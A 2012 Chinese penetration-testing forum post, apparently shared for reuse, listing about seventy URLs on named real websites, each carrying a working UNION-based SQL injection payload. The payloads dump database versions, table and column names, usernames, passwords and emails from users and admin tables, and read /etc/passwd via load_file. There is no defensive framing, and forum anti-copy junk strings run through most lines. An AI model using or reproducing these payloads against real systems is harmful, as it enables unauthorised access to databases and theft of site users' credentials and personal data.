中国网络渗透测试联盟

标题: 老外php灵活注入方法 [打印本页]
作者: admin    时间: 2012-9-15 14:43
标题: 老外php灵活注入方法
灵活的php注入+活的实例演示! 老外那里挖的
; W* C7 ?& ^7 n- S( t) z( b- h+ F* x) @+ _) m# ?2 m* C5 j
http://www.ihrc.org.uk/show.php?id=-99+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13--
, [$ a9 l/ D$ Bhttp://www.witchcraft.nu/newsitem.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10-- 4 O/ y8 h- r" c) ]
http://ccsmi.fas.sfu.ca/newsItem.php?id=-99+UNION+ALL+SELECT+1,2,3,version(),5,6,7,8--
, p/ ?: E6 f+ {  ?http://www.senesco.com/newsitem.php?id=-99+UNION+ALL+SELECT+1,2,3,table_name,5%20from%20information_schema.tables%20where%20table_schema=database ()--
$ W% {9 b, D  V8 Yhttp://www.hpcalc.org/details.php?id=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,id,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+users-- % p. P! a6 c, u
http://www.atlmetal.com/bands/band.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--
" y" \" @+ e+ ?: d" Khttp://www.rocklab.it/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
, x) T8 j( @$ lhttp://www.bandlist24.de/band.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
2 J; `$ T2 k. d% d: O9 v! Shttp://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1--
# I% k+ u' O0 e! Vhttp://www.hamdrams.co.uk/admin.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11%20from%20phpbb_users--
  P3 Y4 {1 ?6 V) Ehttp://www.correiagroup.com/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12-- 8 B% f/ u6 S4 k4 q
http://www.eralincolnrealty.net/ ... +UNION+ALL+SELECT+1,2,3,column_name,5,6,7%20from%20information_schema.columns%20where%20table_nam e='Agent'%20limit%205,1-- & k% l2 k& K% ]
http://www.estatesmall.com/real- ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15--
5 O$ O6 G1 D/ H1 f5 [% fhttp://www.fourstarrealty.com/agent.php?id=-99+UNION+ALL+SELECT+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20admin-- : V& \2 Y$ g* e0 u
http://www.rpmre.com/arealsys/agent.php?id=-99+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13-- 5 x) F! [4 I5 ]! g3 t$ Q" y
http://internet-shares.com/users.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users%20limit%201,1-- ! t, F& I! U8 o4 d
http://www.punkarchives.com/users.php?ID=-99+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,Email),3,4,5,6+from+users-- # {5 b( `0 M, H' t, Y: `' o
http://www.memfis.eu/ko7e7a/users.php?id=-99+UNION+ALL+SELECT+1,2,concat_ws(0x3a,nick,name,email,text),4,5,6,7+from+users--
* T6 K! n1 @" {9 b+ d  ehttp://www.listenuppresident.com ... +UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,Name,Email,Password),8+from+Members%20limit%20 1,1-- & f" A/ h3 D! y5 ^3 v
http://www.newportcoastbroker.co ... +UNION+ALL+SELECT+1,2,unhex(hex(load_file(0x2F6574632F706173737764)))%20from%20mysql.user-- : u7 O% y4 Z9 x# Z! B
http://www.gamesector.org/review.php?id=-83+UNION+ALL+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10-- : c7 z' d) W% S. [
http://www.bgra.net/2004/review.php?id=-12+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26--   m( v) f/ |- A6 ^
http://www.btne.org/members.php?id=-6+UNION+ALL+SELECT+user(),database(),version()-- / b! n% D! j" j7 v/ `, E
http://cormaci.com/pat.php?id=-2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10-- 5 Z9 u/ l$ @: \6 [( U) e+ X0 b
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,0x4E65757472616C69736564,database(),4,5,null,7,8,9-- 2 {' i. P1 K, t. [' c
http://www.punbb.fr/styles/style.php?id=-93+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),database(),4,5,null,7,8,9+from+punbb_users+limit +1,1--
, ]2 s/ p6 Z/ b" ehttp://travalor.com/hunt.php?id=-3+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+limit +0,1-- " i( s. d( O) j1 B7 t* f
http://www.thefalesteam.com/sell.php?ID=-64+UNION+ALL+SELECT+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,version(),user(),database()))),8,9,10,11,12-- ' F/ w4 {/ s$ E+ N# C  ^, Y
http://www.loffice.org/affiliate ... +UNION+ALL+SELECT+1,concat_ws(0x3a,nom,adresse,tel,mail,password),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+membre+limit+0,1-- 6 ]0 V- d$ ?. U- j
http://haasbuilders.com/auth.php?id=-39+UNION+ALL+SELECT+1,concat_ws(0x3a,project_id,project_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from +projects+where+project_id+=+36--
8 \2 C2 |/ N9 z8 N. i% Ahttp://ocmusicfest09.com/artist/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user_name,password,password_hint),8,9,10,11,12,13+from +deleterec-- ( {6 L, @1 ]" G, X0 J
http://www.theatreview.org.nz/re ... +UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3a,username,email,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+members+limit+0,1--
; @+ r% `& L. T/ n/ g$ Qhttp://www.thebartend.com/drinks ... +UNION+ALL+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
  Y! {; v- v+ Ehttp://turfwars2.com/user.php?id=-30+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+limit+1,1-- 2 Q9 H) A; [/ l
http://www.lingo.org.za/short.php?id=-40+UNION+ALL+SELECT+1,2,3,4,5,unhex(hex(password)),7,8,9+from+user-- ( @7 L$ Q& n" n9 e7 @3 a
http://www.lfks.org/halloffame.php?id=-15+UNION+ALL+SELECT+1,id,3,4,5,6,7+from+halloffame--
1 B2 v* H) F  N$ [http://www.spacefleetonline.com/ ... LL+SELECT+concat_ws(0x3a,user_name,real_name,email,address,password)+from+user+limit+0,1 --
  v" ^* u" E$ C" d7 t$ e1 S9 vhttps://www.ncsy.ca/email.php?id=-7+UNION+ALL+SELECT+1,concat_ws(0x3a,version(),user(),database()),3--   ^5 y( y/ E# }) S- i  c+ F
http://www.beaufortbooks.com/books.php?id=-53+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10,11,12,13+from+users+lim it+0,1--
6 n' ^5 C5 h. [  |# F, uhttp://www.andytimmons.com/video.php?id=-0003+UNION+ALL+SELECT+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7,8--
! b; m/ J+ ^+ D- ~2 Bhttp://www.law-and-numbers.de/de ... +UNION+ALL+SELECT+1,null,3,null,0x4E65757472616C69736564,column_name,null,8,9+from+informatio n_schema.columns+limit+0,1--
" ?  i7 N/ }- k) Y# \http://www.uwtuib.com/members.php?id=53+UNION+ALL+SELECT+1,2,concat_ws(0x3a,lname,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+from+members+limit+0,1--
& U8 u1 h$ n' s9 Ohttp://www.retailtherapy.tv/video.php?id=-163+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a,id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+members--
8 O' K- F& S0 \7 ^/ e* E! U% chttp://www.notbbc.co.uk/janet/ms ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat_ws(0x3a,version(),user(),d atabase()))),14,15,16--
9 q  O% G1 e1 Z, @/ N- phttp://www.visitmaldives.com/FAQ/faq.php?Id=-4+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,password,email),4,5+from+users+limit+0,1--
7 O1 f+ p' \+ shttp://www.fair-media.info/reque ... ON+ALL+SELECT+unhex(hex(concat_ws(0x3a,version(),user(),database()))),2--
( e- b1 [6 m' t! {. l8 _! \: Chttp://www.langsfordcenter.com/o ... +UNION+ALL+SELECT+1,2,concat_ws(0x3a,adminid,password)+from+admin_login+limit+2,1--
/ p% j" C% Z; A* F/ W3 Khttp://supersport-ci.com/scan.php?id=-42+UNION+ALL+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user())--
/ Q9 W% ~& W& w% ahttp://www.thediamondworks.co.za ... +UNION+ALL+SELECT+1,2,version(),0x4E65757472616C69736564+from+admin-- * W1 N" U' I. n+ x9 J* c
http://www.nortec.no/stjordal/pc.php?id=-41+UNION+ALL+SELECT+1,2,table_name,4 from information_schema.tables where table_schema=database()-- 9 w0 C; l5 g- [- _4 e5 b. v! k
http://www.webhoster4u.de/server ... +ALL+SELECT+version(),database()--
8 m6 k8 ^; y- I/ m  m7 l/ P9 F$ ^4 Q; ehttp://ens.ewi.tudelft.nl/People ... +UNION+ALL+SELECT+1,2,3,4,5,table_name,7,8,9,10,11,12,13%20from%20information_schema.tables%20wher e%20table_schema=database()%20limit%200,1--
( z5 ~* ^4 W& ^' b0 _7 ]7 H3 Q5 Thttp://www.putridflowers.com/music.php?id=-17+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
$ r5 o; _* N* t6 }https://shop.invictusnetworks.co ... +UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12-- . u, I3 i. L8 {
http://sandiegoscreensavers.com/ ... +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,concat_ws(0x 3a,discount_type,discount_category,discount_currpct,discount_value,discount_active,discount_ref,discount_expiration),77,78,79,80,81,82,83,84,85,86,87, 88+from+discount--   }) d% o. [8 H4 b  ~1 K
http://www.schoolbytes.com/summary.php?id=-99+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users--
$ a2 j0 F" L3 B) u8 Ihttp://www.toprightcorner.com/bio.php?id=-99+UNION+ALL+SELECT+1,2,3,4,4--
/ E: s8 n7 d$ W2 f6 rhttp://www.wang-li.com/art.php?id=-118+UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4--
* \/ G+ _; B2 o4 N# K+ lhttp://www.twisterella.com/indie ... +UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,0x4E65757472616C69736564,9,10, 11+from+users+limit+0,1--
  m& j' e! Y7 S/ g: X5 Ehttp://www.wan-t.cn/www/sec.php?id=-48+UNION+ALL+SELECT+1,2,3,4,5,6,7,0x4E65757472616C69736564-- / A6 M8 q8 P& b& f4 T
http://www.womenastronomers.com/ ... N+ALL+SELECT+concat(username,0x3a,passwor d),2,3,4+from+users---3+UNION+ALL+SELECT+1,null,0x4E65757472616C69736564,4,concat_ws(0x3a,version(),user(),database())--
( M* r( z" R; vhttp://www.fclarchives.org.nz/re ... N+ALL+SELECT+concat(username,0x3a,password),2,3,4+from+users--
( N/ g$ w- D+ G# P: p  {4 E2 xhttp://www.erdelyikopo.net/text/text.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,email,username,password,level)+from+members+limit+ 0,1-- * X* N5 P5 H2 z$ z
http://eng.chiptronic.com/text.php?id=-9+UNION+ALL+SELECT+1,2,3,4,5,6,column_name,8,9,10,11,12--
- a. P* B) x* X' d) Lhttp://www.bitepublishing.co.uk/ ... +UNION+ALL+SELECT+1,concat_ws(0x3,user,pass,admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+from+staff-- 9 J, D5 S; r: F) @' a
http://www.drivers-download.com/ ... +UNION+ALL+SELECT+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10--
" ~0 u! X" _* N8 jhttp://www.consul.cc/email.php?id=-1068+UNION+ALL+SELECT+null,concat_ws(0x3a,email,password),3,4,5+from+Users+limit+3,1-- ! D0 A/ @. G# K. B- S' U
http://www.f1latam.com/esp.php?id=-8+UNION+ALL+SELECT+1,0x4E65757472616C69736564,3,concat_ws(0x3a,version(),database(),user()),5,6-- ! f3 I, ?/ ?5 r6 Q1 D( e+ {+ g
http://bia2.com/music-review/rev ... +UNION+ALL+SELECT+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2